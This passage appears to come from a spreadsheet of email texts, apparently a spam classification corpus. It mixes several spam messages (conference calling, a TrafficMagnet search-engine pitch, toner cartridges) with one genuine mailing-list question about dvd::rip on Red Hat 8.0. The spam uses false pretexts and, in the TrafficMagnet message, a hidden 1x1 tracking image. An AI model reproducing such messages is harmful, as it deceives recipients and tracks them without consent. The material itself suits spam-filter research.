       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks1_9@yahoo.com?subject=3DConference_Inqu=
 iry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #666600
       size=3D1&gt;=FFFFFFA9 1999-2002 CCFL &lt;BR&gt; To be removed from our distri=
 bution lists, please  
       &lt;A href=3D"mailto:d_lete116@eudoramail.com?subject=3DRemove_Conferen=
 cing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: http://iiu.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">--297430269.1023090993312.JavaMail.SYSTEM.emaserver
 Content-Type: text/plain; charset=utf-8
 Content-Transfer-Encoding: 7bit
 Hi
 I visited http://iiu.taint.org, and noticed that you're not listed on some search engines! I think we can
 offer you a service which can help you increase traffic and the number of visitors to your website.
 I would like to introduce you to TrafficMagnet.net. We offer a unique technology that will submit your 
 website to over 300,000 search engines and directories every month.
 You'll be surprised by the low cost, and by how effective this website promotion method can be. 
 To find out more about TrafficMagnet and the cost for submitting your website to over 300,000 search 
 engines and directories, visit www.TrafficMagnet.net. 
 I would love to hear from you. 
 Best Regards,
 Christine Hall 
 Sales and Marketing 
 E-mail: christine@trafficmagnet.net 
 http://www.TrafficMagnet.net
 This email was sent to jm@jmason.org. 
 I understand that you may NOT wish to receive information from me by email. 
 To be removed from this and other offers, simply go to the link below:
 http://emaserver.trafficmagnet.net/trafficmagnet/www/optoutredirect?UC=Lead&amp;UI=3653361
 --297430269.1023090993312.JavaMail.SYSTEM.emaserver
 Content-Type: text/html; charset=utf-8
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;!-- 2.4 --&gt; 
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;STYLE TYPE="text/css"&gt;
 &lt;!--
 TD { font-family: verdana, arial, helvetica; font-size: 11px; color: #000000 }
 --&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF"&gt;
 &lt;BASE HREF="http://www.trafficmagnet.net/img/"&gt;
 &lt;TABLE WIDTH="600" BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;
 &lt;TR&gt;
 	&lt;TD&gt;Hi&lt;BR&gt;
 	&lt;BR&gt;
 	I visited &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.2.SR7$xzpX00f2Eq"&gt;http://iiu.taint.org&lt;/A&gt;, and 
 	noticed that you're not listed on some search engines! I think we can offer 
 	you a service which can help you increase traffic and the number of visitors 
 	to your website.&lt;BR&gt;
 	&lt;BR&gt;
 	I would like to introduce you to &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.2.SR7$xzpX00f2Eq"&gt;TrafficMagnet.net&lt;/A&gt;. We offer a unique technology 
 	that will submit your website to over 300,000 search engines and directories 
 	every month.&lt;BR&gt;
 	&lt;BR&gt; 
 	&lt;TABLE WIDTH="398" BORDER="0" CELLSPACING="0" CELLPADDING="0" ALIGN="center"&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.5.DV6yPcK2jAFHLS"&gt;&lt;IMG SRC="img_tm.gif" WIDTH="137" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.5.DV6yPcK2jAFHLS"&gt;&lt;IMG SRC="img_website.gif" WIDTH="197" HEIGHT="141" BORDER="1"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD VALIGN="bottom"&gt;&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.5.DV6yPcK2jAFHLS"&gt;&lt;IMG SRC="img_signup.gif" WIDTH="62" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/TABLE&gt;
 	&lt;BR&gt;
 	You'll be surprised by the low cost, and by how effective this website promotion 
 	method can be. &lt;BR&gt;
 	&lt;BR&gt;
 	To find out more about TrafficMagnet and the cost for submitting your website 
 	to over 300,000 search engines and directories, visit &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.8.BvequEwT123Roi"&gt;www.TrafficMagnet.net&lt;/A&gt;. 
 	&lt;BR&gt;
 	&lt;BR&gt;
 	I would love to hear from you. &lt;BR&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	Best Regards,&lt;BR&gt;&lt;BR&gt;
 	Christine Hall &lt;BR&gt;
 	Sales and Marketing &lt;BR&gt;
 	E-mail: christine@trafficmagnet.net &lt;BR&gt;
 	&lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/r?1000002827.203.8.BvequEwT123Roi"&gt;http://www.TrafficMagnet.net&lt;/A&gt; 
 	&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 	&lt;TD&gt;&lt;FONT COLOR="#999999"&gt;This email was sent to jm@jmason.org.&lt;BR&gt;
 	I understand that you may NOT wish to receive information from me by email.&lt;BR&gt;
 	To be removed from this and other offers, simply &lt;A HREF="http://emaserver.trafficmagnet.net/trafficmagnet/www/optoutredirect?UC=Lead&amp;UI=3653361"&gt;click here&lt;/A&gt;.&lt;BR&gt;&lt;/FONT&gt;
 	&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://emaserver.trafficmagnet.net/trafficmagnet/www/picture.jsp?UC=Lead&amp;UI=3653361&amp;CRID=203CR1000002827" ALT="." HEIGHT=1 WIDTH=1&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --297430269.1023090993312.JavaMail.SYSTEM.emaserver--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: dvd::rip on Red Hat 8.0?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 Has anyone made a working source RPM for dvd::rip for Red Hat 8.0?
 Matthias has a spec file on the site for 0.46, and there are a couple of
 spec files lying around on the dvd::rip website, including one I patched
 a while ago, but it appears that the Makefile automatically generated is
 trying to install the Perl libraries into the system's, and also at the
 moment dvd::rip needs to be called with PERLIO=stdio as it seems to not
 work with PerlIO on RH8's Perl.
 Not too sure what the cleanest way to fix this is - anyone working on
 this?
 Thanks,
 -- 
 Michèl Alexandre Salim
 Web:		http://salimma.freeshell.org
 GPG/PGP key:	http://salimma.freeshell.org/files/crypto/publickey.asc
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SAVE UP TO 50% ON TONER PRINTER, COPIER, AND FAX CARTRIDGES
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;x-tab&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;p align="center"&gt;
 &lt;b&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#000080" size="3" face="Arial"&gt;GT TONER
 SUPPLIES&lt;br&gt;Laser printer and computer supplies&lt;br&gt;
   1-866-237-7397&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;p align="center"&gt;
 &lt;img border="0" src="http://images.google.com/images?q=tbn:tGi25bBGM4oC:datadevices.home.mindspring.com/4000printer.jpg" width="81" height="69"&gt;
 &lt;img border="0" src="http://images.google.com/images?q=tbn:YoAt4rTmZ8sC:www.cartridge-fill.co.uk/groopprinter.gif" width="81" height="69"&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;i&gt;&lt;font color="#808000" face="Arial" size="4"&gt;Save up to 40% from retail price on laser printer toner
 cartridges,&lt;br&gt;
 copier and fax cartridges.&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt; &lt;/p&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;i&gt;&lt;a href="#prices"&gt;&lt;font face="Comic Sans MS" size="3" color="#0000FF"&gt;CHECK OUT OUR GREAT
 PRICES!&lt;/font&gt;&lt;/a&gt;&lt;/i&gt;
 &lt;/b&gt; &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#80000" size="3" face="Comic Sans MS"&gt;If you received this email on error, please reply to gtts1@cable.net.co with subject: REMOVE... sorry for the inconvenience.
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#808000" size="4" face="Arial"&gt;Please forward to the person responsible for purchasing your laser printer
 supplies.&lt;/font&gt;&lt;/i&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#808000"&gt;&lt;x-tab&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Order by
 phone: (toll free) 1-866-237-7397
 &lt;/font&gt;&lt;font color="#000080"&gt; &lt;br&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;&lt;x-tab&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Order by email: &lt;/font&gt;
 &lt;/font&gt;
 &lt;font color="#0000FF" face="Arial" size="3"&gt;Simply reply&lt;/font&gt;&lt;font color="#000080"&gt; this message or &lt;/font&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF" face="Arial" size="3"&gt;click here&lt;/font&gt;&lt;/a&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#808000"&gt;&amp;nbsp;
 with subject: &lt;/font&gt;&lt;font color="#000080"&gt; ORDER&lt;/font&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/b&gt; &lt;font face="Arial"&gt; &lt;b&gt; &lt;font size="2"&gt; &lt;font color="#808000"&gt;Email
 removal: &lt;/font&gt;&lt;font color="#000080"&gt;Simply reply this message or &lt;/font&gt;
 &lt;/font&gt;
 &lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font size="3" color="#0000FF"&gt;click here&lt;/font&gt;&lt;/a&gt; &lt;font size="2"&gt; &lt;font color="#808000"&gt;
 &lt;x-tab&gt;&amp;nbsp; with subject:
 &lt;/font&gt;&lt;font color="#000080"&gt; REMOVE&lt;/font&gt;&lt;font color="#808000"&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;/font&gt;
 &lt;font color="#000080" size="4"&gt;University&lt;/font&gt; &lt;font size="2"&gt;  and/or
 &lt;/font&gt;
 &lt;font color="#000080" size="4"&gt;School&lt;/font&gt;&lt;font size="3"&gt; &lt;/font&gt; &lt;font size="2"&gt; purchase
 orders WELCOME. (no credit approval required)&lt;br&gt;
 Pay by check, c.o.d, or purchase order (net 30 days).
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#000080" size="3"&gt;WE ACCEPT ALL MAJOR CREDIT CARDS!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;a href="#color"&gt;&lt;font face="Arial" size="3"&gt;New! HP 4500/4550 series color
 cartridges in stock!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;font size="2"&gt; &lt;b&gt;
 &lt;i&gt;&lt;font color="#808000" face="Arial"&gt;
 Our cartridge prices are as follows: &lt;br&gt;
 (please order by item number)&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" color="#000000" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Hewlett
      Packard&lt;a name="prices"&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;font color="#000000"&gt;&lt;b&gt;&lt;font size="2"&gt;1 -- 92274A Toner Cartridge for LaserJet 4L, 4ML, 4P, 4MP
 ------------------------$47.50&lt;br&gt;
 &lt;/font&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 &lt;font size="2"&gt;
 2 -- C4092A Black Toner Cartridge for LaserJet 1100A, ASE, 3200SE-----------------$45.50&lt;br&gt;
 &lt;/font&gt;
 &lt;/span&gt;
 &lt;font size="2"&gt;
 2A - C7115A Toner Cartridge For HP LaserJet 1000, 1200, 3330 ---------------------$55.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 2B - C7115X High Capacity Toner Cartridge for HP LaserJet 1000, 1200, 3330 -------$65.50&lt;br&gt;
 &lt;/span&gt;
 3 -- 92295A Toner Cartridge for LaserJet II, IID, III, IIID ----------------------$49.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 4 -- 92275A Toner Cartridge for LaserJet IIP, IIP+, IIIP -------------------------$55.50&lt;br&gt;
 &lt;/span&gt;
 5 -- C3903A Toner Cartridge for LaserJet 5P, 5MP, 6P, 6Pse, 6MP, 6Pxi ------------$46.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 6 -- C3909A Toner Cartridge for LaserJet 5Si, 5SiMX, 5Si Copier, 8000 ------------$92.50&lt;br&gt;
 &lt;/span&gt;
 7 -- C4096A Toner Cartridge for LaserJet 2100, 2200DSE, 2200DTN ------------------$72.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 8 - C4182X UltraPrecise High Capacity Toner Cartridge for LaserJet 8100 Series---$125.50&lt;br&gt;
 &lt;/span&gt;
 9 -- C3906A Toner Cartridge for LaserJet 5L, 5L Xtra, 6Lse, 6L, 6Lxi, 3100se------$42.50 &lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 9A - C3906A Toner Cartridge for LaserJet 3100, 3150 ------------------------------$42.50&lt;br&gt;
 &lt;/span&gt;
 10 - C3900A Black Toner Cartridge for HP LaserJet 4MV, 4V ------------------------$89.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 11 - C4127A Black Toner Cartridge for LaserJet 4000SE, 4000N, 4000T, 4000TN ------$76.50&lt;br&gt;
 &lt;/span&gt;
 11A- C8061A Black Laser Toner for HP LaserJet 4100, 4100N ------------------------$76.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 11B- C8061X High Capacity Toner Cartridge for LJ4100, 4100N ----------------------$85.50&lt;br&gt;
 &lt;/span&gt;
 11C- C4127X High Capacity Black Cartridge for LaserJet 4000SE,4000N,4000T,4000TN
 -$84.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 12 - 92291A Toner Cartridge for LaserJet IIISi, 4Si, 4SiMX -----------------------$65.50&lt;br&gt;
 &lt;/span&gt;
 13 - 92298A Toner Cartridge for LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5se, 5M, 5N
 --$46.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 14 - C4129X High Capacity Black Toner Cartridge for LaserJet 5000N ---------------$97.50&lt;br&gt;
 &lt;/span&gt;
 15 - LASERFAX 500, 700 (FX1) -----------------------------------------------------$49.00&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 16 - LASERFAX 5000, 7000 (FX2) ---------------------------------------------------$54.00&lt;br&gt;
 &lt;/span&gt;
 17 - LASERFAX (FX3) --------------------------------------------------------------$49.00&lt;/font&gt;&lt;/b&gt;&lt;font size="2"&gt;&lt;br&gt;
 &lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;
 18 - LASERFAX (FX4) --------------------------------------------------------------$49.00&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Hewlett Packard - Color&lt;a name="color"&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;font face="Lucida Sans Typewriter" size="2" color="#000000"&gt;C1 -- C4194a Toner
 Cartridge,
 Yellow (color lj 4500/4550 series)------------------ $ 89.50&lt;br&gt;
 &lt;/font&gt;&lt;/span&gt;&lt;font face="Lucida Sans Typewriter" size="2" color="#000000"&gt;C2 -- C4193a Toner
 Cartridge, Magenta (color lj 4500/4550 series)-----------------
 $ 89.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;C3 -- C4192a toner cartridge, cyan (color lj 4500/4550 series)-------------------- $
 89.50&lt;br&gt;
 &lt;/span&gt;C4 -- c4191a toner cartridge, black (color lj 4500/4550 series)-------------------
 $ 74.50&lt;/font&gt;&lt;/b&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Lexmark&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;font size="2" face="Lucida Sans Typewriter" color="#000000"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;19 - 1380520 High Yield Black Laser Toner for 4019, 4019E, 4028, 4029, 6, 10, 10L -- $109.50&lt;br&gt;
 &lt;/span&gt;20 - 1382150 High Yield Toner for 3112, 3116, 4039-10+, 4049- Model 12L,16R,
 Optra - $109.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;21 - 69G8256 Laser Cartridge for Optra E,
 E+, EP, ES, 4026, 4026 (6A,6B,6D,6E)&amp;nbsp; ---- $ 49.00&lt;br&gt;
 &lt;/span&gt;22 - 13T0101 High Yield Toner Cartridge for Lexmark Optra E310, E312, E312L -------- $ 89.00&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;23 - 1382625 High-Yield Laser Toner Cartridge for Lexmark Optra S (4059) ----------- $129.50&lt;br&gt;
 &lt;/span&gt;24 - 12A5745 High Yield Laser Toner for Lexmark Optra T610, 612, 614 (4069) -------- $165.00&lt;/b&gt;&lt;/font&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Epson&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;25
 ---- S051009 Toner Cartridge for Epson EPL7000, 7500, 8000+ - $115.50&lt;br&gt;
 &lt;/span&gt;25A --- S051009 LP-3000 PS 7000 -------------------------------- $115.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;26 ---- AS051011 Imaging Cartridge for
 ActionLaser-1000, 1500 -- $ 99.50&lt;br&gt;
 &lt;/span&gt;26A --- AS051011 EPL-5000, EPL-5100, EPL-5200 ------------------ $ 99.50&lt;br&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Panasonic&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;font color="#000000" face="Lucida Sans Typewriter" size="2"&gt;&lt;b&gt;27
 ------Nec series 2 models 90 and 95 ---------------------- $109.50&lt;br&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Apple&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;b&gt;&lt;font face="Courier New" size="2" color="#000000"&gt;&lt;span style="background-color: #C4C4A6"&gt;28 ---- 2473G/A Laser Toner for LaserWriter Pro 600, 630, LaserWriter 16/600 PS -
 $ 57.50&lt;br&gt;
 &lt;/span&gt;29 ---- 1960G/A Laser Toner for Apple LaserWriter Select, 300, 310, 360 --------- $
 71.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;30 ---- M0089LL/A Toner Cartridge for Laserwriter 300, 320 (74A) ---------------- $
 52.50&lt;br&gt;
 &lt;/span&gt;31 ---- M6002 Toner Cartridge for Laserwriter IINT, IINTX, IISC, IIF, IIG (95A) - $
 47.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;31A --- M0089LL/A Toner Cartridge for Laserwriter
 LS, NT, NTR, SC (75A) --------- $
 55.50&lt;br&gt;
